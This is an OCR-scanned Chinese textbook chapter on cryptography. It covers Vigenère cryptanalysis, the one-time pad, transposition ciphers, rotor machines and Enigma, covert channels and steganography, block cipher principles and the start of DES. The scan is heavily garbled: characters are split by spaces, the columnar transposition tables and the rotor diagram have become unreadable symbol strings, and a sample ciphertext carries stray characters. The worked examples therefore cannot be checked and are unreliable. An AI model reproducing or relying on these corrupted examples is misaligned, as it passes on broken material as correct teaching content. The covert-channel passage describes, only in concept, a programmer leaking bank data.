例如 密 钥 词 是 deceptive, 那 么 明文 we are discovered save yourself 将 这 样 被 加 密 

Key: deceptivedeceptivedeceptive 

Plaintext: wearediscoveredsaveyourself 

Cihpertext: ZICVTWQNGRZGVTWAVZHCQYGLMG]J 

这 种 密码 的 强度 在 于 每 个 明文 字母 对 应 着 多 个 密 文字 母 , 且 每 次 使 用 唯一 的 字母 作为 
密 钥 词 ,因此 字母 出 现 的 频率 信息 被 隐蔽 了 .不 过 并 非 所 有 的 明文 结构 信息 都 被 隐 项。 尽管 
它 对 于 Playfair 密码 是 一 个 较 大 的 改进 , 却 依然 保留 了 许多 频率 信息 。 可 以 采用 密码 分 析 
学 中 的 一 些 数学 原理 来 对 其 进行 攻击 。 

首先 ,假设 敌手 认为 密 文 是 用 单 表 代 换 或 Vigenere 密码 来 加 密 的 。 可 以 用 一 个 简单 的 
测试 来 做 个 区 分 。 如 果 用 单 表 代 换 ,那么 密 文 的 统计 特性 应 该 与 明文 语言 的 统计 特性 相同 ， 
因此 参照 英文 字母 的 相对 使 用 频率 ,应 该 有 一 个 密 文字 母 出 现 的 频率 大 约 是 12.7%% ,一 个 
大 约 是 9.06% ,等 等 。 如 果 只 有 一 条 消息 可 用 于 密码 分 析 , 那 么 我 们 并 不 期 望 它 体现 出 来 
的 统计 规律 和 明文 完全 一 样 。 然 而 当 它 们 的 统计 规律 非常 接近 时 ,我 们 就 可 以 认为 它 采 用 
了 单 表 加 密 。 

另 一 方面 ,如 果 认 为 采用 了 Vigenere 密码 加 密 , 那 么 它 会 依赖 于 所 用 密 钥 词 的 长 度 。 
发 现 这 个 事实 是 很 重要 的 : 如 果 两 个 相同 的 明文 序列 之 间 的 距离 是 密 钥 词 长 度 的 整数 倍 ， 
那么 产生 的 密 文 序列 也 是 相同 的 。 在 前 面 的 例子 里 ,red 的 两 次 出 现 间隔 9 个 字母 。 在 两 
种 情况 下 ,r 都 是 用 e 加 密 ,e 都 是 用 p 加 密 ,d 都 是 用 t 加 密 , 因 此 得 到 了 两 个 相同 的 密 文 序 
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列 VTW。 

分 析 者 只 要 发 现 重复 序列 VTW ,而 重复 序列 之 间 相 隔 9 个 字母 ,那么 他 就 可 以 认为 密 
钥 词 的 长 度 是 3 或 者 9。VTW 的 两 次 出 现 可 能 是 偶然 ,而 不 一 定 是 用 相同 密 钥 加 密 相同 明 
文 序列 所 导致 的 。 然 而 ,如 果 信息 足够 长 ,就 会 有 大 量 重复 的 密 文 序列 出 现 。 通 过 计算 重复 
密 文 序列 间距 的 公 因子 ,分 析 者 很 快 就 能 猜 出 密 钥 的 长 度 。 

破解 密码 也 依赖 于 另 一 个 重要 的 观察 。 如 果 密 钥 词 的 长 度 为 N, 那 么 密码 实际 上 包含 
了 N 个 单 表 代 换 。 例 如 ,以 deceptive 作为 密 钥 词 ,那么 处 在 位 置 1,10,19,… 的 字母 的 加 密 
实际 上 是 单 表 代 换 。 因 此 ,我 们 可 以 用 明文 语言 的 频率 特性 对 这 样 的 单 表 代 换 分 别 进行 
分 析 。 

虽然 破译 Vigenere 密码 的 技术 并 不 复杂 ,但 是 1917 年 的 一 期 人 科学 美国 人 》 杂 志 上 却 
称 之 为 不 可 破译 的 。 当 对 现代 密码 算法 做 出 类 似 论 断 时 ,这 是 值得 吸取 的 教训 。 


如. 二 次 二 密 


有 一 种 理想 的 加 密 方案 ,叫做 一 次 一 密 乱 码 本 (one-time pad), 由 Major Joseph 
Mauborgne 和 AT&T 公 司 的 Gilbert Vernam 于 1917 年 发 明 , 被 认为 是 一 种 不 可 攻破 的 密 
码 体制 。 

一 次 一 密 乱码 本 不 外 乎 是 一 个 大 的 不 重复 的 真 随机 密 钥 字 母 集 ,这 个 密 钥 字母 集 被 写 
在 几 张 纸 上 , 并 被 粘 成 一 个 乱码 本 。 发 送 者 用 每 一 个 明文 字符 和 一 次 一 密 乱 码 本 密 钥 字 符 
进行 模 26 加 法 运算 得 到 密 文 。 

每 个 密 钥 仅 对 一 个 消息 使 用 一 次 。 发 送 者 对 所 发 送 的 消息 加 密 , 然 后 销毁 乱码 本 中 用 
过 的 一 页 。 接 收 者 有 一 个 同样 的 乱码 本 ,并 依次 使 用 乱码 本 上 的 每 个 密 钥 去 解密 密 文 的 每 
个 字符 。 接 收 者 在 解密 消息 后 销毁 乱码 本 中 用 过 的 一 页 。 新 的 消息 则 用 乱码 本 中 新 的 密 钥 
加 密 。 

因此 ,这 种 方法 其 实 就 是 采用 与 消息 一 样 长 且 无 重复 的 随机 密 钥 来 加 密 消息 , 它 产 生 的 
随机 输出 与 明文 没有 任何 统计 关系 。 因 为 密 文 不 包含 明文 的 任何 信息 ,所 以 无 法 攻破 。 

在 攻击 者 进行 破译 时 , 面 对 一 条 待 破译 的 密 文 ,攻击 者 能 够 找到 很 多 个 与 密 文 等 长 的 密 
钥 , 使 得 破译 出 的 明文 符合 语法 结构 的 要 求 , 因 为 密 钥 本 身 是 随机 的 ,是 没有 规律 的 。 

例如 有 密 文 

ANKYODKYUREPFJBYOJDSPLREYIUNOFDOIUERFPLUYTS 
攻击 者 可 以 找到 很 多 不 同 的 密 钥 ,使 得 采用 这 些 密 钥 解密 后 得 到 一 条 可 读 的 明文 ,例如 下 面 
两 个 密 钥 : 

密 文 : ANKYODKYUREPFJBYOJDSPLREYIUNOFDOIUERFPLUYTS 

密 钥 1: pxlmvmsydoftyrvzwec tnlebnecvgdupahfzzlmnyih 

明文 : mr mustard with the candlestick in the hall 


密 文 : ANKYODKYUREPFJBYOJDSPLREYIUNOFDOIUERFPLUYTS 
密 钥 2: mfugpmiydgaxgoufhklllmhsqdqogtewbqfgyovuhwt 
明文 : miss scarlet with the knife in the library 


假设 密码 分 析 者 找到 这 两 个 密 钥 ,于 是 产生 两 个 似是而非 的 明文 。 分 析 者 如 何 确定 正 
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确 的 解密 呢 ? 如 果 密 钥 在 真正 随机 的 方式 下 产生 ,那么 分 析 者 就 不 能 说 密 钥 更 有 可 能 是 哪 
一 种 。 就 算 在 这 些 可 能 的 密 钥 中 存在 真正 的 密 钥 ,攻击 者 也 无 法 在 这 些 可 能 的 密 钥 中 确定 
真正 的 密 钥 ,因为 密 钥 只 是 用 一 次 ,攻击 者 无 法 用 其 他 密 文 来 验证 这 个 密 钥 , 因 此 没有 办 法 
确定 真正 的 密 钥 ,也 就 是 说 没有 办 法 确定 真正 的 明文 。 

事实 上 ,给 出 任何 长 度 与 密 文 一 样 的 明文 ,都 存在 着 一 个 密 钥 产生 这 个 明文 。 因 此 ,如 
果 用 穷 举 法 搜索 所 有 可 能 的 密 钥 ,就 会 得 到 大 量 可 读 、 清 楚 的 明文 ,但 是 没有 办 法 确定 哪 一 
个 才 是 真正 所 需 的 ,因此 这 种 密码 是 不 可 破 的 。 

一 次 一 密 的 安全 性 完全 取决 于 密 钥 的 随机 性 。 如 果 构 成 密 钥 的 字符 流 是 真正 随机 的 ， 
那么 构成 密 文 的 字符 流 也 是 真正 随机 的 。 因 此 分 析 者 没有 任何 攻击 密 文 的 模式 和 规则 
可 用 。 

但 实际 上 ,要 一 次 一 密 提供 完全 的 安全 性 ,存在 两 个 基本 难点 。 一 个 是 产生 大 规模 随机 
密 钥 的 实际 困难 。 另 外 一 个 是 密 钥 分 配 和 保护 的 问题 ,对 每 一 条 发 送 的 消息 ,需要 提供 给 发 
送 方 和 接收 方 和 明文 等 长 度 的 密 钥 。 因 此 存在 庞大 的 密 钥 分 配 问 题 。 所 以 一 次 一 密 在 实际 
中 很 少 使 用 ,而 主要 用 于 安全 性 要 求 很 高 的 低 带 宽 通信 。 

前 苏联 曾经 在 第 二 次 世界 大 战 后 使 用 过 一 次 一 密 的 方法 来 加 密 间谍 发 送 的 消息 。 用 一 
全 在 每 一 页 上 都 标 有 随机 数字 的 纸 ,每 页 纸 用 于 一 条 消息 ,而 且 只 用 一 次 。 如 果 使 用 正确 ， 
这 种 加 密 机 制 无 法 破解 ,但 是 苏联 人 的 错误 是 没有 正确 使 用 它们 ,重复 使 用 了 一 次 性 便条 ， 
所 以 一 些 消 息 就 被 破解 了 。 
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到 现在 为 止 我 们 讨论 的 都 是 将 明文 字母 代 换 成 为 密 文 字母 。 与 之 不 同 的 另 一 种 加 密 方 
式 是 通过 置换 而 形成 新 的 排列 ,这 种 技术 称 为 置换 密码 。 
最 简单 的 例子 是 栅栏 技术 ,按照 对 角 线 的 顺序 写 入 明文 ,而 按 行 的 顺序 读 出 作为 密 文 。 
例如 ,用 深度 为 2 的 栅栏 技术 加 密 信息 meet me after the toga party, 可 写 为 
mematrhtg pr y 
从 
则 密 文 为 
MEMATRHTGPRYETEFETEOAAT 
一 种 更 加 复杂 的 方案 是 把 消息 一 行 一 行 地 写成 矩形 块 ,然后 按 列 读 出 ,但 是 把 列 的 次 序 
打 乱 。 列 的 次 序 就 是 密 钥 。 例 如 


密 钥 
明文 


Nilnlolo|» 


salols ln 
ol|celo|ln|w 
am |aj|l-n|-n| 
Bil-lols|v 
“|l-.lolola 
< | 一 | | 天 | 


则 生成 的 密 文 为 
TTNAAPTMTSUOAODWCOIXKNLYPETZ 
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单纯 的 置换 密码 因为 有 着 与 原始 明文 相同 的 字母 频率 特征 而 容易 被 破译 。 密 码 分 析 可 
直接 从 密 文 排列 成 矩阵 人 手 , 再 来 处 理 列 的 位 置 。 双 字母 音节 和 三 字母 音节 分 析 方法 可 以 
派 上 用 场 。 

多 步 置换 密码 相对 来 说 要 安全 得 多 。 这 种 复杂 的 置换 是 不 容易 构造 出 来 的 。 因 此 ,如 
果 前 面 那 条 消息 用 相同 算法 再 加 密 一 次 , 则 有 


密 钥 
明文 


solgl-|e 
—|#|l~|i=+|w 
<|lolvls|- 
wilolcls|in 
onl-lols|lu 
-lx|slc|io 
SN | 严 |e|-n | 


则 生成 的 密 文 为 
NSCYAUOPTTWLTMDNAOIEPAXTTOKZ 
为 了 更 清晰 地 看 出 经 过 双重 置换 后 的 结果 ,我们 用 字母 所 在 位 置 序号 来 代 换 原始 明文 
信息 。 于 是 , 共 28 个 字母 的 原始 消息 序列 是 
01 02 03 04 05 06 07 08 09 10 11 12 13 14 
15 16 17 18 19 20 21 22 23 24 25 26 27 28 
经 过 第 一 次 置换 后 变 成 了 
03 10 17 24 04 11 18 25 02 09 16 23 01 08 
15 22 05 12 19 26 06 13 20 27 07 14 21 28 
这 多 少 还 有 些 规律 ,但 是 经 过 二 次 置换 变 成 
17 09 05 27 24 16 12 07 10 02 22 20 03 25 
15 13 04 23 19 14 11 01 26 21 18 08 06 28 
之 后 ,排列 结构 已 经 没有 什么 规律 了 ,分 析 者 攻击 它 要 困难 得 多 。 
当然 ,单纯 的 置换 技术 对 于 现代 密码 分 析 来 说 是 微不足道 的 。 因 此 ,置换 技术 通常 是 与 
代 换 技术 相 结合 使 用 的 ,一 般 地 ,可 先 利用 代 换 技术 加 密 , 再 用 置换 技术 将 密 文 再 次 加 密 。 
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1. 转 轮 机 的 原理 


上 一 节 的 多 步 置 换 的 例子 表明 ,用 多 步 置 换 得 到 的 算法 对 密码 分 析 有 很 大 的 难度 。 这 
对 代 换 密码 也 适用 。 

20 世纪 20 年 代 , 随 着 机 械 和 机 电 技术 的 成 熟 , 以 及 电报 和 无 线 电 需 求 的 出 现 ,引起 了 
密码 设备 方面 的 一 场 革命 一 一 发 明了 转 轮 密码 机 (Rotor, 简 称 转 轮机 ) , 转 轮机 的 出 现 是 密 
码 学 发 展 的 重要 标志 之 一 。 

美国 人 Edward Hebern 认识 到 : 通过 硬件 卷 绕 实现 从 转 轮 机 的 一 边 到 另 一 边 的 单字 
母 代替 ,然后 将 多 个 这 样 的 转 轮机 连接 起 来 ,就 可 以 实现 几乎 任何 复杂 度 的 多 个 字母 代替 。 

转 轮机 由 一 个 键盘 和 一 系列 转 轮 组 成 ,每 个 转 轮 是 26 个 字母 的 任意 组 合 。 转 轮 被 齿轮 
连接 起 来 , 当 一 个 转 轮转 动 时 ,可 以 将 一 个 字母 转换 成 另 一 个 字母 。 照 此 传递 下 去 , 当 最 后 


一 个 转 轮 处理 完 毕 时 ,就 可 以 得 到 加 密 后 的 字母 。 

为 了 使 转 轮 密码 更 安全 ,人 们 还 把 几 种 转 轮 和 移动 齿轮 结合 起 来 ,所 有 转 轮 以 不 同 的 速 
度 转 动 ,并 且 通 过 调整 转 轮 上 字母 的 位 置 和 速度 为 破译 设置 更 大 的 障碍 。 

转 轮 机 的 基本 原理 如 图 2-2 所 示 。 每 个 圆 简 有 26 个 输入 引 脚 和 26 个 输出 引 脚 。 内 部 
连 线 使 每 一 个 输入 仅 同 唯一 一 个 输出 连接 ,为 简明 起 见 , 图 中 只 画 出 了 三 条 内 部 连接 。 


N<xz<cJIHAOTOZZTAA-TTIOTININOW> 


A 
B 
C 
D 
E 
也 
G 
H 
I 
| 
K 
L 
M 
N 
0 
到 
Q 
R 
S 
Tn 
U 
MW 
Ww 
X 
Zz 


N<XE<CJInnO0OOZZCA -LIONTHINOWS 
N<xz<cJuHOTOZZTAR-~“IOTTMNINOW> 


慢 速 转子 
(a) 加 密 一 个 字母 时 (b) 加 密 一 个 字母 后 


图 2-2 三 个 圆 简 的 转 轮机 内 部 结构 


中 速 转子 。 快速 转子 慢 束 转子 。 中 速 转子 


快速 转子 


如 果 我 们 把 每 个 输入 输出 引 脚 当 做 字母 表 中 的 一 个 字母 ,那么 一 个 圆 简 就 定义 了 一 个 
单 表 替换 。 如 果 操 作 员 按 下 代表 字母 A 的 键 ,那么 电信 号 就 加 在 了 第 一 个 圆 简 的 第 一 个 输 
入 引 脚 上 ,经 过 内 部 连 线 被 传送 到 第 25 个 输出 引 脚 。 

考虑 只 有 一 个 圆 简 的 转 轮 机 。 每 次 按 下 一 个 输入 键 , 圆 简 就 旋转 一 个 位 置 , 所 以 内 部 连 
线 也 就 相应 改变 了 。 因 此 就 定义 了 不 同 的 单 表 代 换 密码 。 经 过 26 个 明文 字母 后 , 圆 简 回 到 
最 初 位 置 。 于 是 我 们 可 以 得 到 一 个 周期 为 26 的 多 表 代 换算 法 。 

单 简 系 统 比 较 简 单 , 容 易 对 付 。 转 轮机 的 威力 在 于 它 使 用 了 多 个 圆 简 ,每 个 简 的 输出 引 
脚 连 接 到 下 一 个 简 的 输入 引 脚 。 图 2-2 所 示 的 是 一 个 三 简 系 统 。 如 图 2-2(a) 所 示 , 操 作 员 
从 第 一 个 引 脚 输入 (明文 字母 a) ,经 过 3 个 圆 简 后 ,电信 号 出 现在 第 3 个 圆 简 的 第 2 个 引 脚 
( 密 文字 母 B) 。 如 果 此 时 再 次 输入 明文 字母 a, 则 输出 的 密 文 字母 为 下 ,如 图 2-2(b) 所 示 。 

多 简 系 统 中 ,操作 员 每 按 一 次 输入 键 ,最 后 一 个 转 轮 就 旋转 一 个 引 脚 的 位 置 。 图 2-2(b) 表 
明了 经 过 一 次 按键 后 的 情况 。 最 后 一 个 转 轮 旋转 完 一 圈 后 , 它 前 面 的 一 个 圆 简 就 旋转 一 个 
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引 脚 的 位 置 , 依 此 类 推 。 它 的 原理 看 起 来 有 点 像 钟表 的 时 针 分 针 和 秒针 的 齿轮 。 所 以 整个 
系统 重复 使 用 26X26X26 一 17 567 个 不 同 的 蔡 换 字母 表 ,如 果 用 4 个 或 者 5 个 转 轮 ,周期 
数 将 分 别 为 456 976 和 11 881 376 。 


2. ENIGMA 


1918 年 ,德国 发 明 家 Arthur Scherbius 用 20 世纪 的 电气 技术 来 取代 已 经 过 时 的 铅笔 
加 纸 的 加 密 方法 ,发 明了 恩 尼 格 玛 (ENIGMA) 加 密 机 ,其 实质 就 是 多 简 的 转 轮 机 ,如 图 2-3 
所 示 。ENIGMA 首先 是 作为 商用 加 密 机 器 得 到 应 用 的 。 它 的 专利 在 1918 年 在 美国 得 到 确 
认 。 售 价 大 约 相当 于 现在 的 30 000 美元 。 

ENIGMA 转 轮机 的 大 量 使 用 是 在 第 二 次 世界 大 战 开 始 
后 。 第 二 次 世界 大 战 中 德国 军队 大 约 装 备 了 3 万 台 
ENIGMA ,使 得 德军 通信 的 保密 性 在 当时 世界 上 无 与 伦比 。 
为 了 提高 破译 难度 ,德军 甚至 在 潜艇 通信 时 使 用 了 4 个 甚至 
更 多 转子 的 ENIGMA 转 轮机 。ENIGMA 在 纳粹 德国 第 二 
次 世界 大 战 初期 的 胜利 中 起 到 的 作用 是 决定 性 的 。 

波兰 人 在 1934 年 研究 出 了 破译 ENIGMA 的 方法 ,而 间 
德国 人 在 1938 年 底 又 对 ENIGMA 做 了 大 幅度 改进 。1939 
年 7 月 25 日 ,波兰 情报 部 门 邀 请 英国 和 法 国 的 情报 部 门 共 
商 合作 破译 ENIGMA。 英 国情 报 部 门 在 伦敦 以 北约 80 公 ”图 23 ENIGMA 转 轮机 
里 的 一 个 叫 布 莱 奇 利 的 地 方 征 用 了 一 所 庄园 。 一 个 月 后 ， 
鲜 为 人 知 的 英国 政府 密码 学 校 迁移 到 此 。 不 久 ,一 批 英国 数学 家 也 悄悄 来 到 这 所 庄园 ,破译 
恩 尼 格 玛 密码 的 工作 进入 了 冲刺 阶段 。 在 这 里 刚 开始 时 只 有 500 人 ,战争 结束 时 已 经 增加 
到 了 7000 人 。 

为 了 破译 ENIGMA ,英国 人 将 国内 最 优秀 的 数学 家 悉数 招 进 庄园 。 其 中 就 有 从 剑桥 来 
的 图 灵 , 正 是 他 打破 了 ENIGMA 不 可 战胜 的 神话 。 首 先 , 盟 军 利用 电报 中 可 能 的 闲聊 内 容 
(这 些 内 容 与 每 天 发 生 的 事情 有 关系 ) ,通过 猜测 德国 人 可 能 讨论 的 某 些 地 点 或 者 问题 ,发现 
了 一 些 加 密 文本 的 片段 ,这 些 片段 能 够 联系 到 原始 的 报 文 。 其 次 ,他 们 密切 关注 德国 空军 的 
报 文 。 因 为 德国 空军 的 信号 员 不 如 德国 陆军 和 海军 的 那么 训练 有 素 。 盟 军 注意 到 的 那些 小 
错误 增加 了 他 们 对 加 密 报 文 的 理解 。 例 如 ,德国 空军 的 信号 员 经 常 使 用 女 朋友 的 名 字 作 为 
密 钥 ,或 用 前 一 段 结尾 处 相同 的 设置 来 开始 下 一 段 报 文 。 这 些 信 息 使 得 盟 军 在 英国 战争 
期 间 能 确定 德国 空军 的 一 些 计划 。 因 此 , 当 控制 协议 不 够 完善 时 ,复杂 的 技术 也 可 以 被 
攻破 。 

今天 , 转 轮 机 的 意义 在 于 它 曾经 给 最 为 广泛 使 用 的 密码 一 一 数据 加 密 标准 DES 指明 了 
方向 。 


254 隐蔽 通道 和 隐 写 术 


严格 来 说 ,隐蔽 通道 和 隐 写 术 这 两 种 技术 并 不 是 加 密 ,而 是 隐藏 。 它 们 隐藏 明文 信息 的 
存在 ,而 密码 学 通过 对 文本 信息 的 不 同 转换 而 实现 信息 对 外 的 不 可 读 。 
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例如 ,假设 一 群 孩 子 正 在 准备 一 次 考试 ,形式 为 选择 题 ,答案 为 A、B.C、D。 其 中 一 个 孩 
子 Bob 准备 得 非常 充分 ,他 决定 帮助 其 他 人 。 在 考试 前 ,他 们 商量 好 用 以 下 方式 来 传送 答 
案 : 如 果 Bob 咳嗽 ,表示 该 题 答案 为 A, 如 果 叹 气 , 表 示 该 题 答案 为 B, 等 等 。 外 界 可 能 会 注 
意 到 Bob 的 行为 ,这 个 行为 作为 通道 ,他 的 信息 却 隐藏 在 这 个 公开 的 通道 里 。 这 就 是 隐蔽 
通道 在 人 们 现实 生活 中 的 例子 。 

目前 ,这 种 方法 被 使 用 在 应 用 程序 中 ,例如 一 个 为 银行 写 代码 的 程序 员 在 程序 交付 使 用 
后 ,就 不 能 再 访问 其 中 的 敏感 数据 了 。 但 是 程序 员 可 能 在 程序 中 使 用 了 隐蔽 通道 ,使 程序 在 
运行 期 间 秘密 地 与 自己 通信 ,传输 数据 。 运 行 中 的 程序 如 果 产 生 特 殊 的 输出 会 引起 安全 管 
理 员 的 注意 。 所 以 程序 员 往往 采用 一 些 方式 隐藏 信息 ,例如 将 输出 标题 文字 由 TOTAL 变 
成 TOTALS, 这 样 不 会 引起 人 们 的 注意 ,但 却 创建 了 一 个 一 位 的 隐蔽 通道 。 通 过 检查 标题 
中 是 否 有 S 出 现 ,可 以 传递 一 位 信息 。 同 理 , 在 其 他 地 方 采 用 这 样 的 方法 , 则 可 以 传递 大 量 
信息 。 

关于 隐 写 术 还 有 这 样 的 一 些 例子 : 

字符 标记 : 选择 一 些 印刷 字母 ,用 铅笔 在 其 上 书写 一 遍 。 这 些 标记 需要 做 得 在 一 般 场 
合 下 辨认 不 出 ,除非 将 纸张 从 某 个 角度 对 着 亮光 看 。 

不 可 见 墨水 : 有 些 物 质 用 来 书写 后 不 留 下 痕迹 ,除非 加 热 或 加 入 某 种 化 学 物质 。 

在 目前 的 计算 机 时 代 , 也 可 以 用 类 似 的 方法 。 例 如 利用 图 像 文 件 的 元 余 来 存储 秘密 信 
息 。 让 信息 看 起 来 是 一 张 图 片 ,而 采用 某 种 变换 方式 后 成 为 明文 。 这 形成 了 目前 比较 热门 
的 一 个 研究 领域 : 信息 隐藏 。 

同 加 密 相 比 ,隐蔽 通道 和 隐 写 术 有 一 些 缺点 , 它 需 要 许多 额外 的 付出 来 隐蔽 相对 较 少 的 
信息 。 尽 管 采用 上 述 的 一 些 方案 也 许 有 效 ,但 是 一 旦 被 破解 ,整个 方案 就 毫 无 价值 了 。 

隐蔽 通道 和 隐 写 术 的 优点 是 可 以 应 用 于 通信 双方 宁愿 他 们 的 秘密 通信 被 发 现 而 不 愿 其 
中 的 重要 内 容 丢失 的 情况 。 


对 称 密码 体制 


作为 现代 密码 学 ,虽然 算法 更 加 复杂 ,但 原理 还 是 没 变 。 只 不 过 现代 密码 学 的 算法 是 针 
对 比特 而 不 是 针对 字母 进行 变换 ,实际 上 这 只 是 字母 表 长 度 上 的 改变 : 从 26 个 元 素 变 为 2 
个 元 素 。 大 多 数 优秀 算法 的 主要 组 成 部 分 仍然 是 代 换 和 置换 的 组 合 ,例如 DES 算法 。 

前 面 已 经 提 到 ,对 称 密码 体制 就 是 在 加 密 和 解密 时 用 到 的 密 钥 相同 ,或 者 加 密 密 钥 和 解 
密 密 钥 之 间 存 在 着 确定 的 转换 关系 。 其 实质 是 设计 一 种 算法 ,能 在 密 钥 控制 下 ,把 ”比特 明 
文 简单 而 又 迅速 地 置换 成 唯一 的 ”比特 密 文 ,并 且 这 种 变换 是 可 逆 的 (解密 ) 。 

根据 不 同 的 加 密 方式 ,对 称 密码 体制 又 有 两 种 不 同 的 实现 方式 , 即 分 组 密码 和 序列 密码 
(或 称 流 密码 ) 。 其 中 ,分 组 密码 是 先 把 明文 划分 为 许多 分 组 ,每 个 明文 分 组 被 当做 一 个 整体 
来 产生 一 个 等 长 (通常 情况 下 ) 的 密 文 分 组 ,通常 使 用 的 是 64 位 或 128 位 分 组 大 小 。 而 序列 
密码 则 每 次 加 密 数 据 流 中 的 一 位 或 一 个 字 节 。 


31 分 组 密码 


分 组 密码 体制 是 目前 商业 领域 中 比较 重要 而 流行 的 一 种 加 密 体制 , 它 广泛 地 应 用 于 数 
据 的 保密 传输 、 加 密 存储 等 应 用 场合 。 分 组 密码 对 明文 进行 加 密 时 ,首先 需要 对 明文 进行 分 
组 ,每 组 的 长 度 都 相同 ,然后 对 每 组 明文 分 别 加 密 得 到 等 长 的 密 文 。 分 组 密码 的 安全 性 主要 
依赖 于 密 钥 ,而 不 依赖 于 对 加 密 算法 和 解密 算法 的 保密 ,因此 ,分 组 密码 的 加 密 和 解密 算法 
可 以 公开 。 


1. 要 求 


分 组 密码 算法 实际 上 就 是 在 密 钥 的 控制 下 ,简单 而 迅速 地 找到 一 个 置换 ,用 来 对 明文 分 
组 进行 加 密 变 换 , 一 般 情况 下 对 密码 算法 的 要 求 是 : 

(1) 分 组 长 度 m 足够 大 。 当 分 组 长 度 m 较 小 时 ,分 组 密码 很 类 似 于 某 些 古典 密码 ,如 
维 吉 尼 亚 密码 , 希 尔 密码 和 置换 密码 , 它 仍然 有 效 地 保留 了 明文 中 的 统计 信息 ,这 种 统计 信 
息 将 给 攻击 者 留 下 可 乘 之 机 ,攻击 者 可 以 有 效 地 穷 举 明文 空间 ,得 到 密码 变换 本 身 。 

(2) 密 钥 空间 足够 大 。 分 组 密码 的 密 钥 所 确定 的 密码 变换 只 是 所 有 置换 中 极 小 的 一 部 
分 。 如 果 这 一 部 分 足够 小 ,攻击 者 可 以 有 效 地 通过 穷 举 密 钥 ,确定 所 有 的 置换 。 到 时 ,攻击 
者 就 可 以 对 密 文 进行 解密 ,以 得 到 有 意义 的 明文 。 
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(3) 密码 变换 必须 足够 复杂 。 使 攻击 者 除了 穷 举 法 攻击 以 外 , 找 不 到 其 他 简洁 的 数学 
破译 方法 。 


2. 基本 思想 


为 了 便于 实现 和 分 析 , 在 设计 分 组 密码 时 通常 遵循 以 下 两 个 基本 思想 : 

(1) 扩散 Cdiffusion)。 将 明文 及 密 钥 的 影响 尽 可 能 迅速 地 散布 到 较 多 个 输出 的 密 文 
中 。 产 生 扩散 的 最 简单 方法 是 通过 置换 (比如 重新 排列 字符 ) 。 

(2) 混淆 (confusion)。 其 目的 在 于 使 作用 于 明文 的 密 钥 和 密 文 之 间 的 关系 复杂 化 ,使 
明文 和 密 文 之 间 、 密 文 和 密 钥 之 间 的 统计 相关 特性 极 小 化 ,从 而 使 统计 分 析 攻击 不 能 奏效 。 
通常 的 方法 是 代 换 。 


3. 技术 


具体 来 说 ,可 以 综合 采用 以 下 两 种 技术 : 

(1) 将 大 的 明文 分 组 再 分 成 几 个 小 段 ,分 别 完成 各 个 小 段 的 加 密 置 换 ,最 后 进行 并 行 操 
作 。 这 样 使 得 总 的 分 组 长 度 足 够 大 ,有 利于 对 密码 的 实际 分 析 和 评测 ,以 保证 密码 算法 的 
强度 。 

(2) 采用 乘积 密码 技术 。 乘 积 密码 就 是 以 某 种 方式 连续 执行 两 个 或 多 个 密码 变换 。 例 
如 , 设 有 两 个 子 密码 变换 El 和 E2, 则 先 以 El 对 明文 进行 加 密 , 然 后 再 以 E2 对 所 得 结果 进 
行 加 密 。 其 中 E1 的 密 文 空间 与 E2 的 明文 空间 相同 。 如 果 使 用 得 当 的 话 ,乘积 密码 可 以 有 
效 地 掩盖 密码 变换 的 弱点 ,构成 比 其 中 任意 一 个 密码 变换 强度 更 高 的 密码 系统 。 

典型 的 分 组 密码 有 DES、AES。 


32 数据 加 密 标 准 DES 
321 DES 简 介 


数据 加 密 标准 (Data Encryption Standard,DES) 是 一 种 对 计算 机 数据 进行 密码 保护 的 
数学 算法 , 它 的 产生 被 认为 是 20 世纪 70 年 代 信 息 加 密 技 术 发 展 史 上 的 里 程 碑 之 一 。 由 于 
20 世纪 60 年 代 计算 机 得 到 了 迅猛 的 发 展 , 大 量 的 数据 资料 被 集中 储存 在 大 型 计算 机 数据 
库 中 并 在 计算 机 通信 网 中 进行 传输 ,其 中 有 些 通信 具有 高 度 的 机 密 性 ,有 些 数据 具有 极为 重 
要 的 价值 ,因此 对 计算 机 通信 及 计算 机 数据 进行 保护 的 需求 日 益 增 长 。 当 时 的 美国 虽然 已 
经 制定 了 数据 保密 措施 ,但 是 人 们 普遍 认为 这 些 保密 措施 只 对 业余 人 员 有 效 , 对 于 职业 人 员 
来 说 ,要 截获 通信 信号 、 绕 过 报警 系统 并 接 通通 信 设 备 , 取 出 复制、 删除 ,插入 或 更 改 信 息 是 
不 成 问题 的 。 针 对 这 种 情况 ,有 人 提出 了 两 种 对 数据 进行 保护 的 方法 ,一 种 方法 是 对 数据 进 
行 物理 保护 , 即 把 重要 的 数据 存放 到 安全 的 地 方 ,如 银行 的 地 下 室 中 ; 另 一 种 方法 是 对 数据 
进行 密码 保护 。 

由 于 普遍 认为 加 密 算法 如 果 足 够 复杂 的 话 , 密 码 是 一 种 有 效 的 措施 。 所 以 美国 国家 标 
准 局 NBS 于 1973 年 5 月 发 出 通告 ,公开 征求 一 种 标准 算法 用 于 对 计算 机 数据 在 传输 和 存 
储 期 间 实现 加 密 保护 的 密码 算法 。1975 年 美国 国家 标准 局 接受 了 美国 国际 商业 机 器 公司 
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IBM 推荐 的 一 种 密码 算法 并 向 全 国 公布 ,征求 对 采用 该 算法 作为 美国 信息 加 密 标准 的 
意见 。 

经 过 两 年 的 激烈 争论 ,美国 国家 标准 局 于 1977 年 7 月 正式 采用 该 算法 作为 美国 数据 加 
密 标准 。1980 年 12 月 美国 国家 标准 协会 ANSI 正式 采用 这 个 算法 作为 美国 的 商用 加 密 
算法 。 

DES 是 一 种 对 称 密码 体制 , 它 所 使 用 的 加 密 和 解密 密 钥 是 相同 的 ,是 一 种 典型 的 按 分 
组 方式 工作 的 密码 。 其 基本 思想 是 将 二 进 制 序列 的 明文 分 成 每 64 比特 一 组 ,用 长 为 64 比 
特 的 密 钥 对 其 进行 16 轮 代 换 和 置换 加 密 ,最 后 形成 密 文 。 

DES 的 巧妙 之 处 在 于 除了 密 钥 输入 顺序 ,其 加 密 和 解密 的 步 又 完全 相同 ,这 就 使 得 在 
制作 DES 芯片 时 易于 做 到 标准 化 和 通用 化 。 这 一 点 尤其 适合 现代 通信 的 需要 ,在 DES 出 
现 以 后 ,经 过 许多 专家 学 者 的 分 析 论 证 证 明 它 是 一 种 性 能 良好 的 数据 加 密 算 法 ,不 仅 随 机 特 
性 好 ,线性 复杂 度 高 ,而 且 易于 实现 ,加 上 能 够 标准 化 和 通用 化 ,因此 DES 在 国际 得 到 了 广 
泛 的 应 用 。 


322 DES 加 密 解 密 原理 
DES 是 典型 的 传统 密码 体制 , 它 利 用 传统 的 换 位 和 置换 等 加 密 方法 , 现 介 绍 算法 如 下 : 


